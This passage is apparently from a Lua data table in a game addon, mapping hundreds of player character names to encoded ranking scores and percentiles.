["Oldlie"] = "CB:42/4%",
["Volxx"] = "CM:193/19%",
["Authenix"] = "EM:876/94%",
["Torishu"] = "RT:477/60%EB:549/76%EM:802/87%",
["Hellscrome"] = "CB:39/3%EM:827/84%",
["Sijsuh"] = "EB:727/92%EM:876/90%",
["Iluki"] = "CM:156/14%",
["Terria"] = "RB:221/61%EM:502/75%",
["Shampu"] = "LB:721/96%EM:801/87%",
["Urdi"] = "RM:611/67%",
["Restléss"] = "EB:580/76%EM:807/84%",
["Kielish"] = "UB:143/29%RM:514/72%",
["Froth"] = "CM:29/0%",
["Eldora"] = "EB:628/81%RM:711/74%",
["Kreamator"] = "CB:132/16%RM:717/70%",
["Pokerbank"] = "CM:27/0%",
["Bachs"] = "UM:296/33%",
["Dirtnasty"] = "EB:704/89%EM:898/92%",
["Agar"] = "LB:733/95%LM:930/96%",
["Akari"] = "CM:27/0%",
["Venderino"] = "RM:481/52%",
["Hoffie"] = "CB:27/0%CM:202/19%",
["Epidemyc"] = "UB:383/49%UM:326/33%",
["Madlene"] = "RB:439/60%EM:743/81%",
["Bearizona"] = "UB:158/31%RM:284/50%",
["Dinestra"] = "UM:306/31%",
["Wuzhu"] = "EB:623/79%EM:815/85%",
["Mightyz"] = "RB:439/61%UM:414/48%",
["Flitwik"] = "EB:684/88%EM:834/88%",
["Wtbname"] = "EB:611/78%RM:604/65%",
["Bronn"] = "RM:580/64%",
["Armbar"] = "CM:225/23%",
["Janskylar"] = "UM:263/26%",
["Keet"] = "UM:405/42%",
["Lilbub"] = "LB:718/96%LM:972/98%",
["Beriothien"] = "UB:303/34%RM:610/65%",
["Trashy"] = "UM:406/43%",
["Biubiubb"] = "CM:186/18%",
["Frankyfried"] = "CM:186/19%",
["Krouthu"] = "RB:430/53%EM:793/83%",
["Femer"] = "CM:76/6%",
["Juliseris"] = "CM:191/18%",
["Doubletime"] = "RB:498/69%RM:578/64%",
["Vodkacat"] = "RB:357/67%EM:525/76%",
["Mamaslayher"] = "UB:291/32%RM:698/74%",
["Panzersong"] = "CT:0/2%CM:224/22%",
["Trgorgullo"] = "RB:410/54%EM:824/87%",
["Ackillies"] = "RB:469/59%RM:547/58%",
["Konkor"] = "EB:582/81%EM:724/78%",
["Moonika"] = "CB:28/0%UM:71/35%",
["Yuzukii"] = "UB:302/34%RM:651/70%",
["Nomoreleague"] = "RB:419/51%UM:339/34%",
["Wowsami"] = "UB:320/40%RM:680/72%",
["Salschis"] = "UB:201/25%RM:489/50%",
["Carily"] = "UM:427/46%",
["Wendywd"] = "CM:39/2%",
["Xuxubb"] = "CM:182/17%",
["Waagh"] = "EB:606/77%EM:830/86%",
["Gorghan"] = "RB:370/50%EM:744/81%",
["Restauraunt"] = "CM:144/13%",
["Piogi"] = "CB:106/12%UM:266/27%",
["Carsh"] = "RM:487/74%",
["Shmerlin"] = "CM:65/5%",
["Moocow"] = "EB:461/79%EM:560/79%",
["Chivalry"] = "EB:691/91%LM:911/95%",
["Cigarro"] = "RM:651/71%",
["Darkvicce"] = "CB:47/5%EM:777/77%",
["Sasque"] = "CB:29/1%EM:724/78%",
["Rodent"] = "UB:263/34%EM:831/92%",
["Wumpkin"] = "LT:540/97%EB:614/78%EM:835/87%",
["Toliàn"] = "CM:43/5%",
["Gõõ"] = "EB:586/80%RM:641/71%",
["Scoopofsugar"] = "CB:89/9%RM:555/62%",
["Swimming"] = "RB:513/65%EM:849/88%",
["Lodit"] = "UM:253/25%",
["Tìmthetatman"] = "UM:377/40%",
["Widereceiver"] = "UM:422/43%",
["Tobus"] = "CM:67/5%",
["Føx"] = "CM:97/9%",
["Shmeckles"] = "UM:308/32%",
["Daeveez"] = "RM:551/61%",
["Lunarwalker"] = "RM:485/72%",
["Weektwo"] = "EM:784/82%",
["Semipro"] = "RB:428/58%RM:672/74%",
["Eao"] = "EB:619/79%EM:854/88%",
["Awe"] = "RB:514/71%EM:858/90%",
["Drprincess"] = "CM:172/15%",
["Takkshot"] = "CB:65/7%CM:140/12%",
["Meät"] = "RB:549/70%RM:348/57%",
["Angercow"] = "RB:390/74%EM:536/77%",
["Daddybully"] = "EB:612/78%RM:618/66%",
["Waterdruid"] = "EM:755/90%",
["Requiem"] = "RM:396/60%",
["Littlemaster"] = "EB:495/77%EM:625/79%",
["Lanadelreys"] = "RM:166/51%",
["Exilesky"] = "UB:333/44%RM:602/66%",
["Linteacher"] = "RB:455/58%EM:757/79%",
["Hoshimi"] = "CM:244/24%",
["Necrodiver"] = "RB:424/58%EM:733/77%",
["Mumumissing"] = "RB:421/58%RM:642/71%",
["Kitmir"] = "CM:154/14%",
["Earthworm"] = "RB:302/57%RM:482/66%",
["Dyinbrian"] = "EB:632/80%EM:915/93%",
["Allo"] = "SB:802/99%SM:1046/99%",
["Sharoonz"] = "EB:720/90%LM:969/97%",
["Fallenone"] = "RB:518/72%RM:564/63%",
["Bsill"] = "RB:496/63%RM:633/68%",
["Daxxon"] = "CM:107/10%",
["Ivarlee"] = "UM:101/47%",
["Frawzt"] = "EB:632/80%EM:747/78%",
["Sacredrebel"] = "CB:64/7%CM:138/15%",
["Rogerfederer"] = "CB:165/20%RM:657/72%",
["Zomar"] = "CM:115/23%",
["Êxecute"] = "EM:762/80%",
["Buzkil"] = "EB:637/88%EM:828/87%",
["Mâze"] = "EB:573/76%EM:883/92%",
["Realdealheal"] = "RB:480/66%EM:686/76%",
["Cretan"] = "EB:696/93%EM:871/92%",
["Purifyz"] = "CM:69/5%",
["Pomi"] = "UB:314/42%UM:407/44%",
["Oouchy"] = "CM:156/15%",
["Dive"] = "SB:803/99%LM:979/98%",
["Dorily"] = "EB:617/81%EM:801/85%",
["Rivaled"] = "RB:425/52%RM:668/71%",
["Easycheese"] = "RM:487/52%",
["Inglese"] = "EB:697/89%EM:830/86%",
["Highgravity"] = "UM:366/39%",
["Upayforwater"] = "CB:57/5%UM:345/36%",
["Aalea"] = "RB:381/51%RM:527/57%",
["Tsla"] = "EB:698/90%EM:843/89%",
["Demonswrath"] = "RB:438/59%CM:134/13%",
["Blackirish"] = "CB:163/17%RM:436/65%",
["Emersonn"] = "UM:348/36%",
["Mobbedup"] = "EB:700/88%EM:849/88%",
["Lurtzen"] = "UM:364/37%",
["Colben"] = "CM:133/12%",
["Bobbymissing"] = "UB:338/45%EM:709/78%",
["Gfyr"] = "RB:367/50%RM:708/73%",
["Flosschick"] = "RB:380/50%EM:687/75%",
["Fatalblow"] = "CM:38/3%",
["Tullamoredew"] = "RB:523/67%EM:773/81%",
["Mjles"] = "RM:229/54%",
["Rosetid"] = "RB:436/58%RM:665/73%",
["Superaides"] = "UB:232/29%EM:760/79%",
["Timefly"] = "UM:395/42%",
["Tommytwoface"] = "CM:82/7%",
["Csmonk"] = "EB:579/77%EM:747/81%",
["Jinfreecss"] = "EB:657/84%EM:778/81%",
["Andychen"] = "EB:590/77%RM:622/66%",
["Teacherpiao"] = "RB:492/62%RM:536/57%",
["Gladio"] = "ET:783/94%LB:742/97%EM:906/94%",
["Dubface"] = "CM:51/3%",
["Reddik"] = "CM:134/15%",
["Kîte"] = "EB:705/89%RM:603/64%",
["Smokè"] = "CB:165/20%UM:484/49%",
["Johnchef"] = "RB:496/65%EM:775/81%",
["Eatazz"] = "CB:26/0%CM:25/0%",
["Ashent"] = "UB:356/48%RM:573/64%",
["Vangoghsear"] = "EB:710/89%EM:891/91%",
["Arthalo"] = "EB:435/75%",
["Babybuttlick"] = "EB:651/91%EM:679/83%",
["Tinychacha"] = "EB:553/79%UM:410/49%",
["Gladiatorr"] = "EB:686/88%EM:684/75%",
["Rhaze"] = "RB:516/66%EM:747/78%",
["Oti"] = "RB:409/52%SM:1013/99%",
["Billiemage"] = "CB:85/10%CM:93/8%",
["Voodookin"] = "RB:436/60%RM:537/60%",
["Epigram"] = "CB:192/23%RM:602/64%",
["Waytoobulky"] = "RM:193/53%",
["Nachi"] = "EB:676/87%EM:889/92%",
["Quitality"] = "RB:459/61%EM:684/75%",
["Tinderizer"] = "CM:148/14%",
["Camii"] = "UM:100/47%",
["Ayyde"] = "RB:526/68%RM:571/61%",
["Styròfoam"] = "EB:695/88%EM:900/92%",
["Swiftmane"] = "UM:351/35%",
["Boatsnbeers"] = "EB:655/88%EM:905/94%",
["Kalifornia"] = "UB:247/31%UM:427/46%",
["Ebeb"] = "CB:163/20%UM:285/29%",
["Buttholeous"] = "RB:563/72%EM:736/78%",
["Luckybeef"] = "UB:206/25%UM:280/28%",
["Oblitious"] = "ET:646/85%EB:717/91%EM:875/91%",
["Stissar"] = "CB:27/1%CM:215/22%",
["Alura"] = "EB:566/79%EM:832/90%",
["Frmrs"] = "LB:780/97%LM:929/95%",
["Valotian"] = "UB:335/44%LM:958/98%",
["Tsavok"] = "UB:383/49%RM:570/59%",
["Tormex"] = "RB:517/66%EM:841/87%",
["Octav"] = "LB:720/96%LM:949/98%",
["Zueltan"] = "EB:620/86%EM:840/88%",
["Khàn"] = "RB:456/62%EM:756/80%",
["Greatone"] = "CB:79/9%RM:596/63%",
["Shadowcharge"] = "UB:339/39%EM:432/77%",
["Porktheorc"] = "CM:131/13%",
["Dakmar"] = "EB:729/91%LM:968/97%",
["Auspicious"] = "UM:273/28%",
["Taig"] = "CB:124/13%UM:273/28%",
["Flypmode"] = "RB:475/60%EM:732/77%",
["Frostieflake"] = "CB:50/5%UM:286/29%",
["Fatherdagi"] = "UT:238/29%RB:532/74%RM:688/74%",
["Sampa"] = "RB:507/64%EM:701/75%",
["Pipemaker"] = "LB:763/96%LM:952/96%",
["Tsoù"] = "CM:27/0%",
["Yushiqi"] = "UB:292/37%UM:446/48%",
["Khaliesy"] = "RB:555/72%EM:895/92%",
["Clownfiesta"] = "RM:579/64%",
["Mattdamon"] = "CM:99/12%",
["Phayzd"] = "EB:624/81%EM:719/75%",
["Stillife"] = "EB:622/79%EM:810/84%",
["Pareremorte"] = "CB:99/12%RM:659/70%",
["Totalcontrol"] = "EB:737/92%LM:985/98%",
["Mageezy"] = "RB:525/70%RM:672/73%",
["Omgbeef"] = "CB:51/5%UM:171/47%",
["Shankedu"] = "RB:537/69%EM:845/87%",
["Chachazi"] = "EB:664/91%EM:872/93%",
["Drofo"] = "UB:206/26%RM:692/71%",
["Bohealz"] = "RB:417/57%UM:429/46%",
["Adixion"] = "CB:120/14%RM:546/60%",
["Jesterx"] = "UB:210/26%RM:586/64%",
["Hsram"] = "EB:695/88%EM:919/94%",
["Mythoos"] = "RB:464/72%EM:630/77%",
["Hoii"] = "UB:325/43%RM:611/67%",
["Innocuous"] = "EB:724/92%EM:896/91%",
["Djblazeit"] = "LB:767/96%EM:905/93%",
["Greet"] = "EB:618/85%EM:899/94%",
["Briggs"] = "CM:118/10%",
["Cruxout"] = "CB:101/12%CM:186/18%",
["Jakuro"] = "UB:322/42%RM:649/72%",
["Recreated"] = "LB:782/98%LM:934/96%",
["Urameshï"] = "EB:713/90%EM:763/80%",
["Tugalott"] = "EB:703/90%EM:912/94%",
["Daylightz"] = "RB:505/70%EM:724/79%",
["Fire"] = "EB:648/85%EM:838/88%",
["Cantmilkdese"] = "EB:621/85%EM:861/91%",
["Axeldama"] = "EB:705/89%EM:872/90%",
["Slander"] = "EB:673/86%EM:899/92%",
["Shadestalk"] = "LB:771/97%EM:929/94%",
["Spices"] = "RB:516/65%EM:737/78%",
["Dannydevitoh"] = "EB:571/79%RM:633/70%",
["Bnis"] = "LB:781/98%LM:983/98%",
["Margesimpsôn"] = "EB:624/79%EM:820/85%",
["Caroldanvers"] = "EB:673/91%SM:998/99%",
["Roy"] = "EB:651/85%EM:871/91%",
["Wuha"] = "EB:569/85%EM:747/88%",
["Oldmemories"] = "UB:387/46%RM:602/64%",
["Holymacarone"] = "CM:28/1%",
["Iivid"] = "LB:787/98%LM:964/97%",
["Su"] = "EB:710/89%EM:886/91%",
["Ldtoo"] = "LB:785/98%LM:947/96%",
["Yecko"] = "LB:765/96%EM:854/88%",
["Necha"] = "EB:602/79%EM:779/83%",
["Yn"] = "CB:43/4%RM:642/70%",
["Gigaboo"] = "LB:753/97%LM:939/97%",
["Zonah"] = "CB:106/11%CM:185/17%",
["Fluffydogboy"] = "RB:472/63%CM:213/21%",
["Hellacheeks"] = "RM:512/56%",
["Mingyu"] = "UB:324/37%UM:533/48%",
["Cheeftan"] = "RB:268/60%RM:360/63%",
["Babnelo"] = "EB:714/91%LM:947/96%",
["Dilionharper"] = "ET:729/93%EB:677/86%EM:883/87%",
["Crylo"] = "EB:703/88%EM:941/94%",
["Aoao"] = "UM:277/28%",
["Winzno"] = "CM:34/3%",
["Arsolanda"] = "EB:683/87%EM:817/85%",
["Sano"] = "RB:220/51%RM:379/63%",
["Crank"] = "LB:740/97%SM:975/99%",
["Thirdeyeshyt"] = "RB:478/61%RM:526/56%",
["Fiegi"] = "RB:500/66%EM:712/77%",
["Pooni"] = "LB:782/98%SM:1089/99%",
["Minimit"] = "CM:69/5%",
["Shiryu"] = "EB:670/86%EM:872/90%",
["Fartbreath"] = "EB:737/93%EM:882/90%",
["Ballar"] = "RM:540/57%",
["Barliman"] = "RB:432/56%RM:548/58%",
["Levos"] = "EB:742/94%EM:890/92%",
["Kírby"] = "EB:603/77%RM:674/72%",
["Vgritte"] = "EB:607/80%EM:775/83%",
["Tapout"] = "UM:452/46%",
["Htowñ"] = "RM:533/58%",
["Kuickfix"] = "EB:613/78%EM:749/79%",
["Yunita"] = "UB:98/28%CM:29/1%",
["Lippylu"] = "RB:510/65%RM:558/59%",
["Root"] = "EB:726/92%LM:962/97%",
["Lf"] = "EB:733/92%EM:823/86%",
["Ldl"] = "LB:762/98%LM:921/98%",
["Dysc"] = "LB:735/97%LM:977/98%",
["Krazy"] = "LB:791/98%LM:969/97%",
["Battleðemon"] = "LB:771/96%EM:914/93%",
["Brozenfitch"] = "CM:40/2%",
["Ragefist"] = "EB:753/94%LM:949/96%",
["Mariendorf"] = "RM:409/65%",
["Bulnabang"] = "CB:81/7%UM:315/32%",
["Bìbleman"] = "UB:315/41%EM:727/79%",
["Varrus"] = "UB:345/44%RM:567/58%",
["Atenn"] = "EB:574/79%RM:597/65%",
["Dominatorr"] = "RB:541/72%EM:750/76%",
["Hachíman"] = "CM:113/10%",
["Marico"] = "CB:133/14%EM:634/80%",
["Tigarious"] = "CB:28/1%CM:115/15%",
["Cocanina"] = "CM:85/7%",
["Snowboots"] = "EB:658/83%EM:928/94%",
["Intime"] = "RB:449/57%CM:27/0%",
["Pcm"] = "RM:614/67%",
["Dbl"] = "RB:534/70%EM:879/88%",
["Nevaros"] = "RB:292/67%EM:682/85%",
["Anklesmacker"] = "UB:242/26%RM:649/69%",
["Slipperz"] = "EM:517/75%",
["Kittypryde"] = "EB:509/78%EM:805/90%",
["Dwígt"] = "CM:127/13%",
["Yuffa"] = "UB:345/46%EM:773/84%",
["Chronickilla"] = "UM:303/31%",
["Moankey"] = "UB:226/28%CM:30/2%",
["Ibstabbinu"] = "CB:95/11%CM:196/19%",
["Thornehoof"] = "EB:553/86%EM:603/82%",
["Eikthyrnir"] = "CM:124/11%",
["Tuumiki"] = "CM:29/6%",
["Luxuna"] = "CM:81/7%",
["Calaxe"] = "RM:535/57%",
["Quarantinez"] = "RM:555/61%",
["Narked"] = "CB:61/7%UM:454/47%",
["Bornevil"] = "CB:66/8%RM:468/68%",
["Coldcrow"] = "CM:26/0%",
["Tinkabelle"] = "RM:574/64%",
["Yilidan"] = "UM:355/36%",
["Badeedabadaa"] = "CM:61/4%",
["Kunhefatchoi"] = "CM:63/6%",
["Thôrkell"] = "CM:74/5%",
["Starbuucks"] = "RB:568/74%EM:865/89%",
["Lexterps"] = "EB:695/91%EM:843/92%",
["Lilhood"] = "EB:722/91%LM:981/98%",
["Hydrazoic"] = "UB:333/42%RM:596/62%",
["Error"] = "CB:215/23%RM:562/60%",
["Necrobutchêr"] = "CM:91/8%",
["Strangetamer"] = "EB:648/83%RM:712/74%",
["Rodneytee"] = "RB:227/66%EM:531/76%",
["Sceri"] = "UM:397/42%",
["Cukrekr"] = "EB:709/91%LM:921/95%",
["Reaperbeast"] = "CM:214/21%",
["Optimasquirt"] = "ET:683/89%RB:561/74%CM:192/20%",
["Nikuman"] = "RB:543/69%EM:801/84%",
["Mubo"] = "RM:593/65%",
["Blumpkinn"] = "UM:408/42%",
["Aznpanda"] = "CB:38/3%CM:32/1%",
["Sweettleaf"] = "EM:716/76%",
["Lubey"] = "CB:180/22%EM:780/81%",
["Milesfinch"] = "UM:384/39%",
["Desane"] = "RB:477/62%RM:537/55%",
["Pirp"] = "RM:569/63%",
["Yclin"] = "RB:530/70%EM:684/75%",
["Bloodglory"] = "UM:300/31%",
["Loliconkea"] = "RB:351/56%EM:604/78%",
["Paulyoyo"] = "EB:600/78%EM:740/77%",
["Curryshot"] = "UB:218/27%UM:442/48%",
["Pipefrost"] = "RB:522/69%RM:629/69%",
["Guiltyspark"] = "CM:89/7%",
["Pipebreaker"] = "RB:582/74%EM:739/78%",
["Bsôd"] = "CM:39/2%",
["Xanzidrip"] = "UB:343/46%RM:675/74%",
["Valiantvader"] = "UB:368/49%RM:658/72%",
["Ghostnarwhal"] = "EB:622/80%EM:819/81%",
["Yessirski"] = "CM:64/5%",
["Pewdie"] = "UM:374/38%",
["Elodia"] = "UB:209/25%EM:713/78%",
["Firearrow"] = "RB:514/68%EM:735/77%",
["Jagger"] = "RB:562/72%RM:698/74%",
["Prosperin"] = "RB:461/60%EM:797/83%",
["Feltipoo"] = "UT:131/45%RB:432/59%EM:832/89%",
["Doomslave"] = "UB:210/26%UM:451/49%",
["Yurì"] = "RM:608/67%",
["Divad"] = "RB:446/58%EM:895/91%",
["Hazaa"] = "ET:232/78%EB:714/93%LM:949/97%",
["Penguìn"] = "EB:605/77%EM:881/87%",
["Icemolly"] = "EB:576/76%EM:822/83%",
["Bearhumper"] = "EB:658/85%EM:811/84%",
["Araya"] = "EB:624/79%EM:838/86%",
["Venividivicï"] = "RB:432/59%EM:703/77%",
["Fromashes"] = "RB:534/74%CM:141/12%",
["Kelowna"] = "CB:47/4%RM:650/71%",
["Armlessjoe"] = "UB:327/42%EM:774/83%",
["Acoolhotmage"] = "RM:489/53%",
["Hungdinosaur"] = "RB:463/61%RM:581/64%",
["Goonin"] = "UM:416/45%",
["Failnaught"] = "UM:468/49%",
["Darkvice"] = "RB:477/66%EM:693/76%",
["Gregwar"] = "CM:112/15%",
["Nobadz"] = "SB:849/99%SM:1075/99%",
["Tomraper"] = "EB:749/94%LM:963/97%",
["Eckko"] = "RB:443/70%RM:554/71%",
["Roadhard"] = "UB:359/48%EM:769/84%",
["Clubfootkarl"] = "CB:33/3%UM:333/34%",
["Pyrob"] = "CM:147/13%",
["Pepetoaster"] = "RB:514/66%EM:717/76%",
["Heizenmage"] = "RM:650/71%",
["Pirpjenk"] = "EB:741/94%EM:867/91%",
["Wildnofueks"] = "EB:748/94%LM:945/96%",
["Denjin"] = "UB:297/39%RM:616/68%",
["Opapayryry"] = "EB:600/83%UM:354/37%",
["Quepasta"] = "RT:415/51%EB:701/92%EM:840/89%",
["Jmerk"] = "EB:660/90%LM:967/98%",
["Sorcerio"] = "UM:405/43%",
["Elmelda"] = "UM:431/44%",
["Tightbringer"] = "CM:58/3%",
["Nanimooh"] = "UM:458/46%",
["Noobycake"] = "CB:95/11%UM:360/36%",
["Concernedmom"] = "CM:175/24%",
["Koseksa"] = "UM:201/26%",
["Ihavenohair"] = "RB:440/54%RM:479/50%",
["Evilology"] = "EB:651/84%EM:853/88%",
["Broker"] = "UB:316/36%RM:701/74%",
["Sonzzy"] = "UM:285/29%",
["Orris"] = "UM:262/26%",
["Frostmage"] = "CM:79/12%",
["Fornite"] = "EB:567/78%EM:708/88%",
["Swangín"] = "EB:633/80%RM:576/61%",
["Cleekoh"] = "EB:645/89%SM:1016/99%",
["Boyholetroll"] = "EB:668/90%EM:908/94%",
["Kuroda"] = "RB:398/66%EM:677/82%",
["Nockoso"] = "CM:208/20%",
["Shrekforever"] = "UB:201/46%EM:681/81%",
["Tenpunchman"] = "CB:51/5%UM:101/38%",
["Kfdandan"] = "UB:316/40%RM:685/73%",
["Bloodshot"] = "CM:195/19%",
["Facemelt"] = "RM:290/57%",
["Landrys"] = "UM:305/30%",
["Blöck"] = "CM:28/0%",
["Rookiecow"] = "RB:481/66%UM:444/49%",
["Smages"] = "RB:474/63%EM:704/76%",
["Polehumper"] = "UT:128/45%UB:281/36%RM:489/54%",
["Floren"] = "RM:461/70%",
["Tess"] = "CB:81/9%CM:79/6%",
["Forsakenevil"] = "RB:282/63%EM:606/78%",
["Vampyrika"] = "UB:265/34%CM:160/14%",
["Beesho"] = "EB:658/91%EM:770/88%",
["Bangdingow"] = "UB:264/33%RM:595/61%",
["Trixzor"] = "CM:81/7%",
["Obanai"] = "UT:294/36%UB:345/48%UM:396/47%",
["Vrein"] = "UM:472/48%",
["Dahmer"] = "UB:275/35%RM:582/64%",
["Brskerdragn"] = "CM:158/17%",
["Bedintruding"] = "UM:282/28%",
["Ðemona"] = "EB:616/80%RM:651/67%",
["Snowboard"] = "UM:402/48%",
["Orcpal"] = "RB:498/65%UM:306/30%",
["Tequi"] = "CB:73/8%UM:457/48%",
["Peas"] = "CB:26/0%RM:620/68%",
["Carrotts"] = "CB:128/14%RM:649/72%",
["Chaochao"] = "CB:113/13%CM:95/8%",
["Oleboi"] = "RB:554/71%EM:763/80%",
["Eikon"] = "EB:683/88%EM:792/84%",
["Samash"] = "UT:75/27%EB:675/85%EM:853/87%",
["Pantsner"] = "EB:691/91%LM:922/96%",
["Sheepnbang"] = "CB:53/5%CM:143/13%",
["Kamaja"] = "RT:450/61%RB:333/69%RM:516/55%",
["Hsaze"] = "CM:152/13%",
["Brokenface"] = "EM:768/82%",
["Undeadwiz"] = "CM:34/2%",
["Deranged"] = "EB:696/89%EM:740/77%",
["Shötty"] = "LB:759/95%LM:961/97%",
["Pyrenees"] = "RB:454/59%RM:625/67%",
["Dugoh"] = "CB:52/4%CM:162/14%",
["Ceilina"] = "UB:275/33%EM:729/77%",
["Gomad"] = "UB:275/30%CM:172/18%",
["Savagesteak"] = "UB:406/49%EM:779/91%",
["Kelst"] = "RB:358/72%EM:684/76%",
["Bamerino"] = "UB:321/41%RM:575/63%",
["Uwuyuree"] = "CM:216/21%",
["Yurï"] = "EM:706/77%",
["Nycksi"] = "CB:25/0%RM:540/59%",
["Yureeuwu"] = "UM:365/39%",
["Yurïï"] = "CB:70/8%UM:359/38%",
["Immola"] = "UM:307/31%",
["Daisey"] = "EB:469/75%EM:817/90%",
["Lilbigwater"] = "CB:75/7%",
["Skèèt"] = "CB:97/21%RM:215/52%",
["Kisabake"] = "RB:384/50%RM:538/59%",
["Latinamane"] = "RB:547/70%RM:532/56%",
["Flavorwizard"] = "UM:372/39%",
["Rekeke"] = "CB:144/15%UM:367/36%",
["Megastronk"] = "CB:41/20%RM:576/62%",
["Jster"] = "UB:247/26%CM:133/15%",
["Merlinz"] = "EB:618/81%EM:783/84%",
["Horsé"] = "EB:570/78%EM:790/85%",
["Rubyoni"] = "EB:564/87%EM:690/87%",
["Unholyevil"] = "RM:543/60%",
["Mârk"] = "RB:539/69%LM:938/95%",
["Kroveguard"] = "EB:683/86%SM:1001/99%",
["Magette"] = "EB:624/79%EM:795/83%",
["Tabif"] = "EB:720/92%LM:936/95%",
["Xanzibarz"] = "EB:685/88%EM:885/92%",
["Pooter"] = "CB:68/6%UM:282/28%",
["Kyashimi"] = "RB:290/58%RM:543/74%",
["Djshunter"] = "CB:104/12%RM:591/63%",
["Suda"] = "RB:513/71%EM:871/91%",
["Urgok"] = "UB:109/49%RM:320/61%",
["Mobifish"] = "RB:395/50%RM:535/57%",
["Chapö"] = "EB:605/83%RM:637/71%",
["Valkuthus"] = "CB:71/6%CM:243/24%",
["Ysoserious"] = "UB:327/37%UM:402/41%",
["Yomrrogue"] = "EB:631/80%EM:718/76%",
["Djglitch"] = "UM:332/33%",
["Panics"] = "EB:734/92%EM:880/91%",
["Slutmuffinz"] = "CM:196/20%",
["Nrf"] = "RM:308/63%",
["Octavious"] = "UM:240/44%",
["Verywellthen"] = "UB:287/32%RM:607/65%",
["Thalanar"] = "EM:571/79%",
["Frozenballs"] = "RB:529/70%RM:637/70%",
["Axewound"] = "RB:542/69%EM:894/92%",
["Xrv"] = "RB:401/54%RM:615/67%",
["Kootch"] = "EB:660/89%EM:873/91%",
["Trippyhots"] = "CB:104/11%RM:400/69%",
["Kitkatzy"] = "EB:650/88%LM:914/95%",
["Sunshinegirl"] = "UB:244/30%RM:476/50%",
["Lianshi"] = "RB:414/54%RM:579/64%",
["Zizboon"] = "UB:102/27%CM:151/13%",
["Smartacus"] = "RB:573/73%EM:914/91%",
["Gingerly"] = "CB:196/24%UM:363/38%",
["Timeswift"] = "UB:231/25%CM:202/21%",
["Kohzy"] = "UB:372/44%RM:604/65%",
["Wolfeman"] = "UB:259/33%RM:482/53%",
["Mercers"] = "EB:726/91%LM:988/98%",
["Tutsuni"] = "EB:634/80%EM:873/89%",
["Dwarftism"] = "RB:475/65%EM:782/83%",
["Mightybee"] = "LB:762/95%EM:887/91%",
["Qar"] = "UM:396/40%",
["Feelsogood"] = "UB:350/47%RM:632/69%",
["Hellenkeller"] = "RB:543/70%EM:788/82%",
["Elliyana"] = "EB:613/84%EM:877/92%",
["Reed"] = "RB:512/71%EM:882/93%",
["Aphroditie"] = "CB:116/12%CM:183/17%",
["Danieldaylew"] = "UM:399/42%",
["Baldidiot"] = "UM:428/46%",
["Ahealer"] = "UM:302/31%",
["Catatafish"] = "UM:285/29%",
["Beside"] = "UB:210/26%UM:322/33%",
["Littlejewel"] = "CB:83/8%UM:342/36%",
["Loer"] = "CB:143/18%UM:396/40%",
["Dislocated"] = "UM:353/36%",
["Bayani"] = "UM:287/29%",
["Jedudia"] = "RM:482/69%",
["Ryanhobo"] = "EB:591/81%EM:838/89%",
["Vexie"] = "RB:478/61%EM:738/78%",
["Dietr"] = "CM:62/4%",
["Hellrott"] = "RB:413/56%UM:307/40%",
["Coriel"] = "UM:437/45%",
["Platetrain"] = "UB:298/33%RM:749/70%",
["Brin"] = "CB:36/2%CM:175/16%",
["Damengbaby"] = "UB:219/27%RM:479/50%",
["Bgravvy"] = "EB:701/88%LM:939/95%",
["Buddyholly"] = "LB:774/97%LM:961/97%",
["Phragmoplast"] = "UB:357/47%RM:565/63%",
["Yuchibo"] = "UB:336/44%EM:699/76%",
["Snarf"] = "RB:280/68%RM:472/73%",
["Azerion"] = "RB:297/62%RM:448/69%",
["Zinjul"] = "RB:438/57%RM:668/71%",
["Ludyn"] = "LB:753/95%LM:965/97%",
["Slumchemist"] = "EB:744/94%LM:953/96%",
["Never"] = "LB:728/95%EM:852/90%",
["Spankgetti"] = "EB:725/92%LM:938/95%",
["Puffbuffcast"] = "RB:425/58%UM:448/48%",
["Hulkulese"] = "EB:650/88%EM:868/93%",
["Propel"] = "EB:635/80%EM:775/81%",
["Wígglés"] = "RB:460/60%RM:529/54%",
["Spidereggs"] = "EB:662/83%EM:941/94%",
["Evading"] = "CM:119/11%",
["Boomsquirt"] = "RM:553/57%",
["Hellojello"] = "UM:206/25%",
["Kyme"] = "RB:476/66%EM:865/91%",
["Trikwar"] = "UT:302/42%EB:650/88%EM:773/88%",
["Zingyish"] = "EB:634/82%EM:844/87%",
["Blazewun"] = "LM:944/95%",
["Artistirl"] = "CM:26/0%",
["Tearabull"] = "EM:800/83%",
["Vittorica"] = "CB:201/24%RM:574/63%",
["Galoralys"] = "RB:478/66%RM:625/69%",
["Evalar"] = "UT:100/32%EB:715/94%LM:957/97%",
["Zemphoths"] = "EB:739/93%EM:925/94%",
["Cutegirlirl"] = "EB:618/85%LM:978/98%",
["Jacktwo"] = "CM:44/2%",
["Lildancinboi"] = "CM:208/20%",
["Cashed"] = "LB:768/98%LM:942/97%",
["Wugzz"] = "RB:552/72%RM:697/72%",
["Mutz"] = "CM:232/23%",
["Rom"] = "LB:722/95%LM:935/96%",
["Ikypoo"] = "EB:626/81%EM:886/89%",
["Ameyuri"] = "UB:369/46%EM:856/88%",
["Tristmegistu"] = "UM:362/39%",
["Healthfood"] = "UM:331/34%",
["Frostythesno"] = "CB:102/12%CM:122/11%",
["Windsoul"] = "CM:87/12%",
["Gouzii"] = "CM:29/1%",
["Soridormie"] = "CM:36/5%",
["Jamall"] = "EB:727/94%LM:911/95%",
["Bebe"] = "UB:222/27%RM:530/58%",
["Dew"] = "EB:732/92%EM:862/88%",
["Hotpockett"] = "UB:264/34%UM:407/44%",
["Nlats"] = "EB:682/92%EM:891/94%",
["Huck"] = "EB:622/81%EM:832/86%",
["Boatcaptain"] = "EB:587/81%EM:819/88%",
["Truecult"] = "UM:431/44%",
["Pacification"] = "CB:107/12%UM:289/30%",
["Artannis"] = "UB:263/28%CM:148/16%",
["Zórak"] = "CM:146/14%",
["Sevenleven"] = "CM:47/3%",
["Jzm"] = "UB:346/47%UM:322/33%",
["Wolfkeeper"] = "EB:652/88%EM:783/85%",
["Manbear"] = "EB:559/79%EM:777/91%",
["Krackn"] = "RB:494/68%EM:785/85%",
["Timeout"] = "CB:189/23%RM:568/61%",
["Meichao"] = "CB:169/20%RM:517/54%",
["Orangekitty"] = "UB:384/49%EM:732/77%",
["Oldlong"] = "RM:331/64%",
["Themilkmoney"] = "CB:81/8%RM:390/62%",
["Vexyz"] = "RM:685/70%",
["Deadsesh"] = "CM:28/0%",
["Notthefeds"] = "UB:246/47%EM:607/79%",
["Gary"] = "UB:311/41%",
["Suibian"] = "EB:589/89%EM:644/84%",
["Mìkasa"] = "LB:718/95%EM:899/94%",
["Bigluck"] = "EB:680/90%EM:785/89%",
